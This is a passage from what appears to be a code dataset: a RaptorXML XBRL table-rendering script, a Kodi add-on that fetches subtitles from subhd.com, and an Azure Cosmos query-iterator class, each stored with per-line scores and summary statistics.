"</head>\n", "<body>\n", "\"\"\")\n", "\n", " # Calculate table data\n", " tables = {}\n", " contexts = list(instance.contexts)\n", " roles = [(role, dts.role_type(role).definition.value) for role in dts.presentation_link_roles()]\n", " roles = sorted(roles, key=lambda role: role[1].split(' - ')[0])\n", " for role in roles:\n", " presentation_network = dts.presentation_base_set(role[0]).network_of_relationships()\n", " roots = list(presentation_network.roots)\n", " tables[role] = calcTableData(instance,role,contexts,*analyzePresentationTree(presentation_network,roots))\n", "\n", " # Generate table index\n", " for role in roles:\n", " if tables[role]['columns']:\n", " file.write('<h4><a href=\"#table_%s\">%s</a></h4>\\n' % (role[1].split(' - ')[0], role[1])) \n", "\n", " # Generate html rendering of each non-empty table\n", " for role in roles:\n", " if tables[role]['columns']:\n", " generateTable(file, role, tables[role])\n", "\n", "# Main entry point, will be called by RaptorXML after the XBRL instance validation job has finished\n", "def on_xbrl_finished(job, instance):\n", " # instance object will be None if XBRL 2.1 validation was not successful\n", " if instance:\n", " path = os.path.join(job.output_dir,'table.html')\n", " with builtins.open(path,mode='w',newline='') as file:\n", " generateTables(file, instance.dts, instance)\n", " # Register new output file with RaptorXML engine\n", " job.append_output_filename(path)" ]
[ 0, 0.3333333333333333, 0, 0, 0, 0.3333333333333333, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.024390243902439025, 0, 0, 0.07692307692307693, 0, 0.04, 0, 0, 0, 0, 0, 0.043478260869565216, 0, 0, 0, 0, 0, 0.05263157894736842, 0, 0, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0.0379746835443038, 0, 0, 0.03488372093023256, 0.1111111111111111, 0.04411764705882353, 0, 0, 0.016129032258064516, 0.02666666666666667, 0, 0.045454545454545456, 0, 0, 0, 0.018518518518518517, 0, 0.015873015873015872, 0.03875968992248062, 0, 0.03409090909090909, 0, 0.02531645569620253, 0, 0, 0.07936507936507936, 0, 0, 0, 0.2, 0, 0, 0, 0.027777777777777776, 0, 0, 0.017857142857142856, 0, 0, 0.010309278350515464, 0.012345679012345678, 0, 0, 0.034482758620689655, 0.1111111111111111, 0, 0, 0.02247191011235955, 0, 0, 0, 0, 0.010526315789473684, 0, 0.011235955056179775, 0, 0, 0, 0.010752688172043012, 0, 0.011235955056179775, 0, 0, 0, 0.07692307692307693, 0.0125, 0, 0, 0, 0.017094017094017096, 0, 0, 0, 0, 0.2, 0, 0, 0.03571428571428571, 0.011235955056179775, 0.013513513513513514, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0, 0.024691358024691357, 0, 0.024096385542168676, 0, 0, 0, 0, 0, 0, 0.2, 0.027777777777777776, 0.023255813953488372, 0.2, 0.05405405405405406, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0.2, 0.04, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0.2, 0.02631578947368421, 0.04081632653061224, 0.2, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0.014084507042253521, 0, 0.024390243902439025, 0.2, 0, 0, 0, 0.013333333333333334, 0, 0, 0, 0.010869565217391304, 0, 0.030303030303030304, 0, 0, 0, 0.009259259259259259, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012658227848101266, 0, 0, 0.02027027027027027, 0, 0, 0, 0, 0.2, 0, 0.2, 0.03409090909090909, 0.027586206896551724, 0.2, 0.024390243902439025, 0, 0, 0, 0, 0, 0, 0, 0, 0.019417475728155338, 0, 0.013986013986013986, 0.020833333333333332, 0.02040816326530612, 
0.01694915254237288, 0.0196078431372549, 0.021739130434782608, 0.01904761904761905, 0, 0, 0, 0, 0, 0, 0, 0, 0.009900990099009901, 0, 0, 0.010752688172043012, 0, 0.043859649122807015, 0, 0, 0, 0, 0.01904761904761905, 0, 0, 0, 0, 0, 0, 0.01, 0.02702702702702703, 0, 0, 0.017543859649122806, 0.03225806451612903, 0, 0, 0.025 ]
304
0.019153
false
# -*- coding: utf-8 -*- import re import os import sys import xbmc import urllib import urllib2 import xbmcvfs import xbmcaddon import xbmcgui,xbmcplugin from bs4 import BeautifulSoup __addon__ = xbmcaddon.Addon() __author__ = __addon__.getAddonInfo('author') __scriptid__ = __addon__.getAddonInfo('id') __scriptname__ = __addon__.getAddonInfo('name') __version__ = __addon__.getAddonInfo('version') __language__ = __addon__.getLocalizedString __cwd__ = xbmc.translatePath( __addon__.getAddonInfo('path') ).decode("utf-8") __profile__ = xbmc.translatePath( __addon__.getAddonInfo('profile') ).decode("utf-8") __resource__ = xbmc.translatePath( os.path.join( __cwd__, 'resources', 'lib' ) ).decode("utf-8") __temp__ = xbmc.translatePath( os.path.join( __profile__, 'temp') ).decode("utf-8") sys.path.append (__resource__) SUBHD_API = 'http://www.subhd.com/search/%s' SUBHD_BASE = 'http://www.subhd.com' UserAgent = 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)' def log(module, msg): xbmc.log((u"%s::%s - %s" % (__scriptname__,module,msg,)).encode('utf-8'),level=xbmc.LOGDEBUG ) def normalizeString(str): return str def GetHttpData(url, data=''): if data: req = urllib2.Request(url, data) else: req = urllib2.Request(url) req.add_header('User-Agent', UserAgent) try: response = urllib2.urlopen(req) httpdata = response.read() response.close() except: log(__name__, "%s (%d) [%s]" % ( sys.exc_info()[2].tb_frame.f_code.co_name, sys.exc_info()[2].tb_lineno, sys.exc_info()[1] )) return '' return httpdata def Search( item ): subtitles_list = [] log( __name__ ,"Search for [%s] by name" % (os.path.basename( item['file_original_path'] ),)) if item['mansearch']: search_string = item['mansearchstr'] elif len(item['tvshow']) > 0: search_string = "%s S%.2dE%.2d" % (item['tvshow'], int(item['season']), int(item['episode']),) else: search_string = item['title'] url = SUBHD_API % (urllib.quote(search_string)) data = GetHttpData(url) try: soup = BeautifulSoup(data) except: return 
results = soup.find_all("div", class_="box") for it in results: link = SUBHD_BASE + it.find("div", class_="d_title").a.get('href').encode('utf-8') #version = it.find(text=re.compile('(字幕翻译|听译版本|机翻版本|官方译本)'.decode('utf-8'))).parent.get('title').encode('utf-8') version = it.find_all("span", class_=re.compile("label"))[-1].get('title').encode('utf-8') if version: if version.find('本字幕按 ') == 0: version = version.split()[1] else: version = '未知版本' try: r2 = it.find_all("span", class_="label") langs = [x.text.encode('utf-8') for x in r2][:-1] except: langs = '未知' name = '%s (%s)' % (version, ",".join(langs)) if ('英文' in langs) and not(('简体' in langs) or ('繁体' in langs)): subtitles_list.append({"language_name":"English", "filename":name, "link":link, "language_flag":'en', "rating":"0", "lang":langs}) else: subtitles_list.append({"language_name":"Chinese", "filename":name, "link":link, "language_flag":'zh', "rating":"0", "lang":langs}) if subtitles_list: for it in subtitles_list: listitem = xbmcgui.ListItem(label=it["language_name"], label2=it["filename"], iconImage=it["rating"], thumbnailImage=it["language_flag"] ) listitem.setProperty( "sync", "false" ) listitem.setProperty( "hearing_imp", "false" ) url = "plugin://%s/?action=download&link=%s&lang=%s" % (__scriptid__, it["link"], it["lang"] ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=url,listitem=listitem,isFolder=False) def rmtree(path): if isinstance(path, unicode): path = path.encode('utf-8') dirs, files = xbmcvfs.listdir(path) for dir in dirs: rmtree(os.path.join(path, dir)) for file in files: xbmcvfs.delete(os.path.join(path, file)) xbmcvfs.rmdir(path) def Download(url,lang): try: rmtree(__temp__) except: pass try: os.makedirs(__temp__) except: pass subtitle_list = [] exts = [".srt", ".sub", ".txt", ".smi", ".ssa", ".ass" ] try: data = GetHttpData(url) soup = BeautifulSoup(data) id = soup.find("button", class_="btn btn-danger btn-sm").get("sid").encode('utf-8') url = "http://subhd.com/ajax/down_ajax" 
values = {'sub_id':id} para = urllib.urlencode(values) data = GetHttpData(url, para) match = re.compile('"url":"([^"]+)"').search(data) url = match.group(1).replace(r'\/','/').decode("unicode-escape").encode('utf-8') if url[:4] <> 'http': url = 'http://subhd.com%s' % (url) data = GetHttpData(url) except: return [] if len(data) < 1024: return [] zip = os.path.join(__temp__, "subtitles%s" % os.path.splitext(url)[1]) with open(zip, "wb") as subFile: subFile.write(data) subFile.close() xbmc.sleep(500) if data[:4] == 'Rar!' or data[:2] == 'PK': xbmc.executebuiltin(('XBMC.Extract("%s","%s")' % (zip,__temp__,)).encode('utf-8'), True) path = __temp__ dirs, files = xbmcvfs.listdir(path) if len(dirs) > 0: path = os.path.join(__temp__, dirs[0].decode('utf-8')) dirs, files = xbmcvfs.listdir(path) list = [] for subfile in files: if (os.path.splitext( subfile )[1] in exts): list.append(subfile.decode('utf-8')) if len(list) == 1: subtitle_list.append(os.path.join(path, list[0])) else: sel = xbmcgui.Dialog().select('请选择压缩包中的字幕', list) if sel == -1: sel = 0 subtitle_list.append(os.path.join(path, list[sel])) return subtitle_list def get_params(): param=[] paramstring=sys.argv[2] if len(paramstring)>=2: params=paramstring cleanedparams=params.replace('?','') if (params[len(params)-1]=='/'): params=params[0:len(params)-2] pairsofparams=cleanedparams.split('&') param={} for i in range(len(pairsofparams)): splitparams={} splitparams=pairsofparams[i].split('=') if (len(splitparams))==2: param[splitparams[0]]=splitparams[1] return param params = get_params() if params['action'] == 'search' or params['action'] == 'manualsearch': item = {} item['temp'] = False item['rar'] = False item['mansearch'] = False item['year'] = xbmc.getInfoLabel("VideoPlayer.Year") # Year item['season'] = str(xbmc.getInfoLabel("VideoPlayer.Season")) # Season item['episode'] = str(xbmc.getInfoLabel("VideoPlayer.Episode")) # Episode item['tvshow'] = normalizeString(xbmc.getInfoLabel("VideoPlayer.TVshowtitle")) # 
Show item['title'] = normalizeString(xbmc.getInfoLabel("VideoPlayer.OriginalTitle")) # try to get original title item['file_original_path'] = urllib.unquote(xbmc.Player().getPlayingFile().decode('utf-8')) # Full path of a playing file item['3let_language'] = [] if 'searchstring' in params: item['mansearch'] = True item['mansearchstr'] = params['searchstring'] for lang in urllib.unquote(params['languages']).decode('utf-8').split(","): item['3let_language'].append(xbmc.convertLanguage(lang,xbmc.ISO_639_2)) if item['title'] == "": item['title'] = xbmc.getInfoLabel("VideoPlayer.Title") # no original title, get just Title if item['title'] == os.path.basename(xbmc.Player().getPlayingFile()): # get movie title and year if is filename title, year = xbmc.getCleanMovieTitle(item['title']) item['title'] = normalizeString(title.replace('[','').replace(']','')) item['year'] = year if item['episode'].lower().find("s") > -1: # Check if season is "Special" item['season'] = "0" # item['episode'] = item['episode'][-1:] if ( item['file_original_path'].find("http") > -1 ): item['temp'] = True elif ( item['file_original_path'].find("rar://") > -1 ): item['rar'] = True item['file_original_path'] = os.path.dirname(item['file_original_path'][6:]) elif ( item['file_original_path'].find("stack://") > -1 ): stackPath = item['file_original_path'].split(" , ") item['file_original_path'] = stackPath[0][8:] Search(item) elif params['action'] == 'download': subs = Download(params["link"], params["lang"]) for sub in subs: listitem = xbmcgui.ListItem(label=sub) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=sub,listitem=listitem,isFolder=False) xbmcplugin.endOfDirectory(int(sys.argv[1]))
[ "# -*- coding: utf-8 -*-\n", "\n", "import re\n", "import os\n", "import sys\n", "import xbmc\n", "import urllib\n", "import urllib2\n", "import xbmcvfs\n", "import xbmcaddon\n", "import xbmcgui,xbmcplugin\n", "from bs4 import BeautifulSoup\n", "\n", "__addon__ = xbmcaddon.Addon()\n", "__author__ = __addon__.getAddonInfo('author')\n", "__scriptid__ = __addon__.getAddonInfo('id')\n", "__scriptname__ = __addon__.getAddonInfo('name')\n", "__version__ = __addon__.getAddonInfo('version')\n", "__language__ = __addon__.getLocalizedString\n", "\n", "__cwd__ = xbmc.translatePath( __addon__.getAddonInfo('path') ).decode(\"utf-8\")\n", "__profile__ = xbmc.translatePath( __addon__.getAddonInfo('profile') ).decode(\"utf-8\")\n", "__resource__ = xbmc.translatePath( os.path.join( __cwd__, 'resources', 'lib' ) ).decode(\"utf-8\")\n", "__temp__ = xbmc.translatePath( os.path.join( __profile__, 'temp') ).decode(\"utf-8\")\n", "\n", "sys.path.append (__resource__)\n", "\n", "SUBHD_API = 'http://www.subhd.com/search/%s'\n", "SUBHD_BASE = 'http://www.subhd.com'\n", "UserAgent = 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'\n", "\n", "def log(module, msg):\n", " xbmc.log((u\"%s::%s - %s\" % (__scriptname__,module,msg,)).encode('utf-8'),level=xbmc.LOGDEBUG )\n", "\n", "def normalizeString(str):\n", " return str\n", "\n", "def GetHttpData(url, data=''):\n", " if data:\n", " req = urllib2.Request(url, data)\n", " else:\n", " req = urllib2.Request(url)\n", " req.add_header('User-Agent', UserAgent)\n", " try:\n", " response = urllib2.urlopen(req)\n", " httpdata = response.read()\n", " response.close()\n", " except:\n", " log(__name__, \"%s (%d) [%s]\" % (\n", " sys.exc_info()[2].tb_frame.f_code.co_name,\n", " sys.exc_info()[2].tb_lineno,\n", " sys.exc_info()[1]\n", " ))\n", " return ''\n", " return httpdata\n", "\n", "def Search( item ):\n", " subtitles_list = []\n", "\n", " log( __name__ ,\"Search for [%s] by name\" % (os.path.basename( item['file_original_path'] 
),))\n", " if item['mansearch']:\n", " search_string = item['mansearchstr']\n", " elif len(item['tvshow']) > 0:\n", " search_string = \"%s S%.2dE%.2d\" % (item['tvshow'],\n", " int(item['season']),\n", " int(item['episode']),)\n", " else:\n", " search_string = item['title']\n", " url = SUBHD_API % (urllib.quote(search_string))\n", " data = GetHttpData(url)\n", " try:\n", " soup = BeautifulSoup(data)\n", " except:\n", " return\n", " results = soup.find_all(\"div\", class_=\"box\")\n", " for it in results:\n", " link = SUBHD_BASE + it.find(\"div\", class_=\"d_title\").a.get('href').encode('utf-8')\n", " #version = it.find(text=re.compile('(字幕翻译|听译版本|机翻版本|官方译本)'.decode('utf-8'))).parent.get('title').encode('utf-8')\n", " version = it.find_all(\"span\", class_=re.compile(\"label\"))[-1].get('title').encode('utf-8')\n", " if version:\n", " if version.find('本字幕按 ') == 0:\n", " version = version.split()[1]\n", " else:\n", " version = '未知版本'\n", " try:\n", " r2 = it.find_all(\"span\", class_=\"label\")\n", " langs = [x.text.encode('utf-8') for x in r2][:-1]\n", " except:\n", " langs = '未知'\n", " name = '%s (%s)' % (version, \",\".join(langs))\n", " if ('英文' in langs) and not(('简体' in langs) or ('繁体' in langs)):\n", " subtitles_list.append({\"language_name\":\"English\", \"filename\":name, \"link\":link, \"language_flag\":'en', \"rating\":\"0\", \"lang\":langs})\n", " else:\n", " subtitles_list.append({\"language_name\":\"Chinese\", \"filename\":name, \"link\":link, \"language_flag\":'zh', \"rating\":\"0\", \"lang\":langs})\n", "\n", " if subtitles_list:\n", " for it in subtitles_list:\n", " listitem = xbmcgui.ListItem(label=it[\"language_name\"],\n", " label2=it[\"filename\"],\n", " iconImage=it[\"rating\"],\n", " thumbnailImage=it[\"language_flag\"]\n", " )\n", "\n", " listitem.setProperty( \"sync\", \"false\" )\n", " listitem.setProperty( \"hearing_imp\", \"false\" )\n", "\n", " url = \"plugin://%s/?action=download&link=%s&lang=%s\" % (__scriptid__,\n", " 
it[\"link\"],\n", " it[\"lang\"]\n", " )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=url,listitem=listitem,isFolder=False)\n", "\n", "def rmtree(path):\n", " if isinstance(path, unicode):\n", " path = path.encode('utf-8')\n", " dirs, files = xbmcvfs.listdir(path)\n", " for dir in dirs:\n", " rmtree(os.path.join(path, dir))\n", " for file in files:\n", " xbmcvfs.delete(os.path.join(path, file))\n", " xbmcvfs.rmdir(path) \n", "\n", "def Download(url,lang):\n", " try: rmtree(__temp__)\n", " except: pass\n", " try: os.makedirs(__temp__)\n", " except: pass\n", "\n", " subtitle_list = []\n", " exts = [\".srt\", \".sub\", \".txt\", \".smi\", \".ssa\", \".ass\" ]\n", " try:\n", " data = GetHttpData(url)\n", " soup = BeautifulSoup(data)\n", " id = soup.find(\"button\", class_=\"btn btn-danger btn-sm\").get(\"sid\").encode('utf-8')\n", " url = \"http://subhd.com/ajax/down_ajax\"\n", " values = {'sub_id':id}\n", " para = urllib.urlencode(values)\n", " data = GetHttpData(url, para)\n", " match = re.compile('\"url\":\"([^\"]+)\"').search(data)\n", " url = match.group(1).replace(r'\\/','/').decode(\"unicode-escape\").encode('utf-8')\n", " if url[:4] <> 'http':\n", " url = 'http://subhd.com%s' % (url)\n", " data = GetHttpData(url)\n", " except:\n", " return []\n", " if len(data) < 1024:\n", " return []\n", " zip = os.path.join(__temp__, \"subtitles%s\" % os.path.splitext(url)[1])\n", " with open(zip, \"wb\") as subFile:\n", " subFile.write(data)\n", " subFile.close()\n", " xbmc.sleep(500)\n", " if data[:4] == 'Rar!' 
or data[:2] == 'PK':\n", " xbmc.executebuiltin(('XBMC.Extract(\"%s\",\"%s\")' % (zip,__temp__,)).encode('utf-8'), True)\n", " path = __temp__\n", " dirs, files = xbmcvfs.listdir(path)\n", " if len(dirs) > 0:\n", " path = os.path.join(__temp__, dirs[0].decode('utf-8'))\n", " dirs, files = xbmcvfs.listdir(path)\n", " list = []\n", " for subfile in files:\n", " if (os.path.splitext( subfile )[1] in exts):\n", " list.append(subfile.decode('utf-8'))\n", " if len(list) == 1:\n", " subtitle_list.append(os.path.join(path, list[0]))\n", " else:\n", " sel = xbmcgui.Dialog().select('请选择压缩包中的字幕', list)\n", " if sel == -1:\n", " sel = 0\n", " subtitle_list.append(os.path.join(path, list[sel]))\n", "\n", " return subtitle_list\n", "\n", "def get_params():\n", " param=[]\n", " paramstring=sys.argv[2]\n", " if len(paramstring)>=2:\n", " params=paramstring\n", " cleanedparams=params.replace('?','')\n", " if (params[len(params)-1]=='/'):\n", " params=params[0:len(params)-2]\n", " pairsofparams=cleanedparams.split('&')\n", " param={}\n", " for i in range(len(pairsofparams)):\n", " splitparams={}\n", " splitparams=pairsofparams[i].split('=')\n", " if (len(splitparams))==2:\n", " param[splitparams[0]]=splitparams[1]\n", "\n", " return param\n", "\n", "params = get_params()\n", "if params['action'] == 'search' or params['action'] == 'manualsearch':\n", " item = {}\n", " item['temp'] = False\n", " item['rar'] = False\n", " item['mansearch'] = False\n", " item['year'] = xbmc.getInfoLabel(\"VideoPlayer.Year\") # Year\n", " item['season'] = str(xbmc.getInfoLabel(\"VideoPlayer.Season\")) # Season\n", " item['episode'] = str(xbmc.getInfoLabel(\"VideoPlayer.Episode\")) # Episode\n", " item['tvshow'] = normalizeString(xbmc.getInfoLabel(\"VideoPlayer.TVshowtitle\")) # Show\n", " item['title'] = normalizeString(xbmc.getInfoLabel(\"VideoPlayer.OriginalTitle\")) # try to get original title\n", " item['file_original_path'] = urllib.unquote(xbmc.Player().getPlayingFile().decode('utf-8')) # Full path 
of a playing file\n", " item['3let_language'] = []\n", "\n", " if 'searchstring' in params:\n", " item['mansearch'] = True\n", " item['mansearchstr'] = params['searchstring']\n", "\n", " for lang in urllib.unquote(params['languages']).decode('utf-8').split(\",\"):\n", " item['3let_language'].append(xbmc.convertLanguage(lang,xbmc.ISO_639_2))\n", "\n", " if item['title'] == \"\":\n", " item['title'] = xbmc.getInfoLabel(\"VideoPlayer.Title\") # no original title, get just Title\n", " if item['title'] == os.path.basename(xbmc.Player().getPlayingFile()): # get movie title and year if is filename\n", " title, year = xbmc.getCleanMovieTitle(item['title'])\n", " item['title'] = normalizeString(title.replace('[','').replace(']',''))\n", " item['year'] = year\n", "\n", " if item['episode'].lower().find(\"s\") > -1: # Check if season is \"Special\"\n", " item['season'] = \"0\" #\n", " item['episode'] = item['episode'][-1:]\n", "\n", " if ( item['file_original_path'].find(\"http\") > -1 ):\n", " item['temp'] = True\n", "\n", " elif ( item['file_original_path'].find(\"rar://\") > -1 ):\n", " item['rar'] = True\n", " item['file_original_path'] = os.path.dirname(item['file_original_path'][6:])\n", "\n", " elif ( item['file_original_path'].find(\"stack://\") > -1 ):\n", " stackPath = item['file_original_path'].split(\" , \")\n", " item['file_original_path'] = stackPath[0][8:]\n", "\n", " Search(item)\n", "\n", "elif params['action'] == 'download':\n", " subs = Download(params[\"link\"], params[\"lang\"])\n", " for sub in subs:\n", " listitem = xbmcgui.ListItem(label=sub)\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=sub,listitem=listitem,isFolder=False)\n", "\n", "xbmcplugin.endOfDirectory(int(sys.argv[1]))\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07692307692307693, 0, 0, 0, 0.02, 0.021739130434782608, 0, 0.0196078431372549, 0.021739130434782608, 0, 0.046511627906976744, 0.0449438202247191, 0.06060606060606061, 0.05555555555555555, 0, 0.03225806451612903, 0, 0.021739130434782608, 0, 0.0125, 0, 0.045454545454545456, 0.050505050505050504, 0, 0.038461538461538464, 0, 0, 0.03225806451612903, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0.15, 0, 0, 0.061224489795918366, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0.01098901098901099, 0.01652892561983471, 0.010101010101010102, 0, 0, 0, 0, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0.04895104895104895, 0, 0.04895104895104895, 0, 0, 0, 0, 0.017543859649122806, 0.017241379310344827, 0.014492753623188406, 0.027777777777777776, 0, 0.038461538461538464, 0.03389830508474576, 0, 0.012195121951219513, 0.023809523809523808, 0.024096385542168676, 0.013513513513513514, 0.03773584905660377, 0, 0.05555555555555555, 0, 0, 0, 0, 0, 0, 0, 0.04, 0, 0.08333333333333333, 0.038461538461538464, 0.11764705882352941, 0.03225806451612903, 0.11764705882352941, 0, 0, 0.01639344262295082, 0, 0, 0, 0.010869565217391304, 0, 0.03225806451612903, 0, 0, 0, 0.02247191011235955, 0.03333333333333333, 0, 0, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.020618556701030927, 0, 0, 0, 0, 0, 0, 0, 0.03773584905660377, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.05555555555555555, 0.07692307692307693, 0.03571428571428571, 0.03571428571428571, 0.037037037037037035, 0.044444444444444446, 0.024390243902439025, 0.023255813953488372, 0.02127659574468085, 0.058823529411764705, 0, 0.037037037037037035, 0.019230769230769232, 0.02631578947368421, 0.018867924528301886, 0, 0, 0, 0.045454545454545456, 0, 0, 0.02564102564102564, 0.02564102564102564, 0.02564102564102564, 0.019230769230769232, 0.018867924528301886, 0.018691588785046728, 0.019230769230769232, 0.024, 0.007874015748031496, 0.027777777777777776, 0, 0, 0, 0, 0, 0, 0.0125, 0, 0, 
0.01639344262295082, 0.0078125, 0, 0.03614457831325301, 0, 0, 0.008547008547008548, 0.011363636363636364, 0, 0, 0.03508771929824561, 0, 0, 0.03278688524590164, 0.03571428571428571, 0.011764705882352941, 0, 0.031746031746031744, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.0392156862745098, 0, 0 ]
243
0.013297
false
# The MIT License (MIT) # Copyright (c) 2014 Microsoft Corporation # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. """Iterable query results in the Azure Cosmos database service. """ from azure.core.paging import PageIterator # type: ignore from azure.cosmos._execution_context import execution_dispatcher # pylint: disable=protected-access class QueryIterable(PageIterator): """Represents an iterable object of the query results. QueryIterable is a wrapper for query execution context. """ def __init__( self, client, query, options, fetch_function=None, collection_link=None, database_link=None, partition_key=None, continuation_token=None, ): """Instantiates a QueryIterable for non-client side partitioning queries. _ProxyQueryExecutionContext will be used as the internal query execution context. :param CosmosClient client: Instance of document client. :param (str or dict) query: :param dict options: The request options for the request. 
:param method fetch_function: :param method resource_type: The type of the resource being queried :param str resource_link: If this is a Document query/feed collection_link is required. Example of `fetch_function`: >>> def result_fn(result): >>> return result['Databases'] """ self._client = client self.retry_options = client.connection_policy.RetryOptions self._query = query self._options = options if continuation_token: options['continuation'] = continuation_token self._fetch_function = fetch_function self._collection_link = collection_link self._database_link = database_link self._partition_key = partition_key self._ex_context = execution_dispatcher._ProxyQueryExecutionContext( self._client, self._collection_link, self._query, self._options, self._fetch_function ) super(QueryIterable, self).__init__(self._fetch_next, self._unpack, continuation_token=continuation_token) def _unpack(self, block): continuation = None if self._client.last_response_headers: continuation = self._client.last_response_headers.get("x-ms-continuation") or \ self._client.last_response_headers.get('etag') if block: self._did_a_call_already = False return continuation, block def _fetch_next(self, *args): # pylint: disable=unused-argument """Return a block of results with respecting retry policy. This method only exists for backward compatibility reasons. (Because QueryIterable has exposed fetch_next_block api). :return: List of results. :rtype: list """ block = self._ex_context.fetch_next_block() if not block: raise StopIteration return block
[ "# The MIT License (MIT)\n", "# Copyright (c) 2014 Microsoft Corporation\n", "\n", "# Permission is hereby granted, free of charge, to any person obtaining a copy\n", "# of this software and associated documentation files (the \"Software\"), to deal\n", "# in the Software without restriction, including without limitation the rights\n", "# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n", "# copies of the Software, and to permit persons to whom the Software is\n", "# furnished to do so, subject to the following conditions:\n", "\n", "# The above copyright notice and this permission notice shall be included in all\n", "# copies or substantial portions of the Software.\n", "\n", "# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n", "# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n", "# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n", "# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n", "# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n", "# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n", "# SOFTWARE.\n", "\n", "\"\"\"Iterable query results in the Azure Cosmos database service.\n", "\"\"\"\n", "from azure.core.paging import PageIterator # type: ignore\n", "from azure.cosmos._execution_context import execution_dispatcher\n", "\n", "# pylint: disable=protected-access\n", "\n", "\n", "class QueryIterable(PageIterator):\n", " \"\"\"Represents an iterable object of the query results.\n", "\n", " QueryIterable is a wrapper for query execution context.\n", " \"\"\"\n", "\n", " def __init__(\n", " self,\n", " client,\n", " query,\n", " options,\n", " fetch_function=None,\n", " collection_link=None,\n", " database_link=None,\n", " partition_key=None,\n", " continuation_token=None,\n", " ):\n", " \"\"\"Instantiates a QueryIterable for non-client side partitioning 
queries.\n", "\n", " _ProxyQueryExecutionContext will be used as the internal query execution\n", " context.\n", "\n", " :param CosmosClient client: Instance of document client.\n", " :param (str or dict) query:\n", " :param dict options: The request options for the request.\n", " :param method fetch_function:\n", " :param method resource_type: The type of the resource being queried\n", " :param str resource_link: If this is a Document query/feed collection_link is required.\n", "\n", " Example of `fetch_function`:\n", "\n", " >>> def result_fn(result):\n", " >>> return result['Databases']\n", "\n", " \"\"\"\n", " self._client = client\n", " self.retry_options = client.connection_policy.RetryOptions\n", " self._query = query\n", " self._options = options\n", " if continuation_token:\n", " options['continuation'] = continuation_token\n", " self._fetch_function = fetch_function\n", " self._collection_link = collection_link\n", " self._database_link = database_link\n", " self._partition_key = partition_key\n", " self._ex_context = execution_dispatcher._ProxyQueryExecutionContext(\n", " self._client, self._collection_link, self._query, self._options, self._fetch_function\n", " )\n", " super(QueryIterable, self).__init__(self._fetch_next, self._unpack, continuation_token=continuation_token)\n", "\n", " def _unpack(self, block):\n", " continuation = None\n", " if self._client.last_response_headers:\n", " continuation = self._client.last_response_headers.get(\"x-ms-continuation\") or \\\n", " self._client.last_response_headers.get('etag')\n", " if block:\n", " self._did_a_call_already = False\n", " return continuation, block\n", "\n", " def _fetch_next(self, *args): # pylint: disable=unused-argument\n", " \"\"\"Return a block of results with respecting retry policy.\n", "\n", " This method only exists for backward compatibility reasons. 
(Because\n", " QueryIterable has exposed fetch_next_block api).\n", "\n", " :return: List of results.\n", " :rtype: list\n", " \"\"\"\n", " block = self._ex_context.fetch_next_block()\n", " if not block:\n", " raise StopIteration\n", " return block\n" ]
